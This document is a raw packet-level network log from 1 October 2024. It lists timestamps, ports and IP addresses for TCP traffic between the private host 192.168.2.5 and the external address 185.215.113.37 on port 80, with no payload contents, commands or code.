Oct 1, 2024 16:50:07.510205984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510214090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510216951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510226965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510232925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510236979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510246038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510267019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510277987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510281086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510281086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510293961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510303974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510319948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510334015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510341883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510341883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510345936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510356903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510364056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510368109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510379076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510389090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510397911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510401011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510409117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510411024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510418892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510447979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510447979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510454893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510466099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510468960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510476112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510488033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510497093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510508060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510519981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510524035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510524035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510530949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510539055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510550022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510555029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510572910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510584116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510591984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510593891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510631084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510631084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510632038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510648012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510658026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510682106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510691881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510691881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510703087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510729074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510729074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510791063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510801077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510811090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510821104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510832071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510842085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510858059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510869026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510878086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510878086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510879993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510891914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510901928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.510924101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510924101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.510973930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511075974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511086941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511096001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511106014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511116028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511126041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511126995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511137962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511148930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511158943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511159897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511171103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511179924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511190891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511199951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511199951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511217117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511226892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511238098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511246920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511251926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511254072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511257887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511262894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511265993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511276960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511281013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511287928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511297941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511303902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511312962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511317015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511323929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.511326075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511362076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.511401892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.597599983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597616911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597628117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597697020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597708941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597719908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597731113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597743034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.597759008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.597785950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.597806931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598143101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598202944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598229885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598242044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598278999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598309994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598375082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598730087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598746061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598757029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598767996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598779917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598784924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598828077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598828077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598885059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598896980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598906994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598922968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598932981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598948956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598948956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598948956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598961115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598970890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598980904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.598983049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.598990917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599001884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599010944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599021912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599031925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599034071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599042892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599054098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599064112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599076986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599076986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599081039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599092007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599092007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599101067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599127054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599148989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599152088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599163055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599173069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599183083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599194050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599205017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599206924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599215031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599234104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599244118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599244118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599261045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599271059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599280119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599286079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599294901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599307060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599317074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599323988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599323988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599329948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599342108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599353075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599364042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599380016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599380016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599406004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599450111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599458933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599461079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599477053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599487066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599497080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599507093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599517107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599524975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599524975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599526882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599538088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599545956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599549055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599560976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599570990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599582911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599592924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.599598885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599598885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599618912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.599656105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.632925987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633013010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633023024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633039951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633045912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633050919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633068085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633069038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633080006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633090019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633111000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633126974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633131027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633137941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633148909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633161068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633169889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633169889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633200884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633210897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633220911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633232117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633238077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633238077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633244991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633255005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633268118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633300066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633300066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633317947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633322001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633375883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633420944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633431911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633449078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633460045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633470058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633475065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633481026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633491039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633503914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633521080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633529902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633529902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633532047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633542061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633547068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633558035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633559942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633569002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633579969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633593082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633603096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633611917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633614063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633625984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633630991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633635998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633649111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633667946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633678913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633685112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633685112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633688927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633699894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633723974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633729935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633738995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633743048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.633744001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633749962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633754969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633765936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633769035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633775949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.633903980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686067104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686089993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686100006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686176062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686187029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686197042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686208010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686218977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686228037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686253071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686263084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686547995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686558008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686568975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686621904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686621904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686629057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686639071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686649084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686661005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686677933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686686039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686698914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686698914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686753988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686769962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686779976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686789989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686813116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686824083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686834097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686841965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686841965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686845064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686856031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686901093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686901093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.686918020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.686995029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.687031031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687041998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.687052011 CEST	80	49704	185.215.113.37	192.168.2.5
